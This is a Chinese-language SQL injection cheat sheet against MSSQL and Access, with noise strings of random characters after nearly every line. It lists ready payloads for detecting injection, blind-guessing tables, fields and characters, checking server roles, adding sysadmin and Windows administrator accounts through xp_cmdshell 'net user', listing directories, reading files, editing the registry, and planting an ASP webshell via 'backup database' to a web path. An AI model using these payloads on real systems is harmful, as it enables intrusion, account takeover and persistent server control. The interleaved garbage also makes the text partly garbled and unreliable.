1.判断是否有注入;and 1=1 ;and 1=2 '�{:�WxGgi
2.初步判断是否是mssql ;and user>0 �$�4\,a��^
f�CL�5E�t
3.注入参数是字符'and [查询条件] and ''=' x>^r%<�WbX
%{*}KsS`�p
4.搜索时没过滤参数的'and [查询条件] and '%25'=' T��lD)���E
9WaKs�d��f
5.判断数据库系统 %Bo��/v�B'
6^pddG�IG�
;and (select count(*) from sysobjects)>0 mssql xG05OqKpE�
YY���(,�H!
;and (select count(*) from msysobjects)>0 access h[S�uu�W��
XAV�|xlfm
/X����G�4O
^�h
�z4IZ^
6.猜数据库 ;and (select Count(*) from [数据库名])>0 gOpGwpYZ,�
j�jgjeY���
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 w1-�/�U+0o
-,t2D/��xK
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �Q
Fv�"!Ql
oGi;S�=�"I
9.(1)猜字段的ascii值(access) 8m�0Gx�g�S
F�^Yt�\V~T
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 15i8) 4��h
`Trp�v$���
(2)猜字段的ascii值(mssql) 7tgn�"�wK
E"e��<��9�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 $=�/.���oh
Hf
]aA_: �
10.测试权限结构(mssql) $0C1'�;=^}
[]D@"Bz��
$okGqu8z.O
"�=0#pH1o�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �Y�4Hi<JWo
� �R�^We�d
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- >qj��Q;z[�
ULq���#2l�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �ALq�P;�/�
/�F;b<kIy8
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 75j��`3wzu
�'"��{ �IV
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- _C3l�2v'I$
_��_\Tv>Y
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- V�45\�.V��
A�+Nf�](�[
;and 1=(select IS_MEMBER('db_owner'));-- U$j*{�`�$4
�W8:?�y*6�
D�GMvYNKTj
SG1fu�<Q6J
11.添加mssql和系统的帐户 t&+f:)��n
"oX����@Z^
;exec master.dbo.sp_addlogin username;-- /
�l�h3.\|
;exec master.dbo.sp_password null,username,password;-- �5UE5;��yo
&�u-H/C�U%
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 0�GW(?7�ZC
�@Gz�Ehv��
;exec master.dbo.xp_cmdshell 'net user username password R��=jIV�w'
�"�>QNiR�!
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �yDBS :
\
�iV5x-G`��
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �H-Gl�CVq~
X��kZ82w#b
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �@G����0k+
RI_:~^nO{r
�md_9bq/�w
x�3�5(���i
12.(1)遍历目录 =vx�i��qRm
;E�Z$8�|�
;create table dirs(paths varchar(100), id int) i�X��0s4��
: E�`N0U�A
;insert dirs exec master.dbo.xp_dirtree 'c:\' "�V!y"��yQ
H"�8fnN=xB
;and (select top 1 paths from dirs)>0 ��Wb�:j�Z
T&6W>VQ|[>
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) P��YDf|S7�
'o�jI�_%9<
KD9������Y
~C6Qp�`�VF
(2)遍历目录 ]���K'iCYY
"f|��\"�:\
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ~GJJ{Bm_�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �GQXN1R
�
f.k�u� v"�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 F�Cv3ZF?K�
sr�!�m� ��
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 *6%!�i7kr�
`���RUOZ@r
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 J�_�A+�)_�
bV_@�!KL$�
Sns`/4S?6Z
W)^0~[`i�
13.mssql中的存储过程 �G�j]*_�"T
z�-�*/�jFE
xp_regenumvalues 注册表根键, 子键 .C����fi�/
�n:cre}�0.
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 Rc�kq�r7�q
�.b*%c�?�e
xp_regread 根键,子键,键值名 ��a=�*�&OW
#% �Pn�Z
/
;exec xp_regread ���Td%[ -
H�MT^g�mF)
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ep�a)~/s�A
.�K>r��ao'
xp_regwrite 根键,子键, 值名, 值类型, 值 �e1r�u#'�z
>gqM�|-uY�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �MM8r*T4g/
}Z�5#�{Sd�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 D_fg��x��l
q~9�Y��&>D
xp_regdeletevalue 根键,子键,值名 y'ULhDgq^B
O���(BA��w
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ��u��!TVvc
�q1QrtJFPG
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 Z'EX�q.�hk
d�6ZJh��xJ
iXpLcHi���
\U�b=Wm\��
14.mssql的backup创建webshell 4�%�do.�D*
Y@'ug N|[C
use model l�
:\�D��C
l�I��HSy�
create table cmd(str image); R1�Jj �3k
)*_4�=-�8H
insert into cmd(str) values (''); �CCp&P5[67
I9GRSm;�0<
backup database model to disk='c:\l.asp'; M$�j��]V�Z
_<x4/".}B3
zb/w^~J�_i
(orO=gST-/
15.mssql内置函数 ���X�!r9��
|����R�k$u
;and (select @@version)>0 获得Windows的版本号 �5nL�,sF�d
z.itVQs$I
;and user_name()='dbo' 判断当前系统的连接用户是不是sa qE73M5L�&
�W#1t%h�T$
;and (select user_name())>0 爆当前系统的连接用户 n�~xh
%�r;
dQ+{�D�v3A
;and (select db_name())>0 得到当前连接的数据库 /L,VZ?CmtK
`* !t<?$i�
�|/�B�2B�m
i}mvKV?!|1
16.简洁的webshell noz&4"S.{�
7��U�_~_yb
use model �G&FA~��c�
_\�M�:h+^�
create table cmd(str image); �,�1�+AfI�
�:Z�0m�� "
insert into cmd(str) values (''); S`m�s[^-q*
&y-(UOqbkP
backup database model to disk='g:\wwwtest\l.asp';
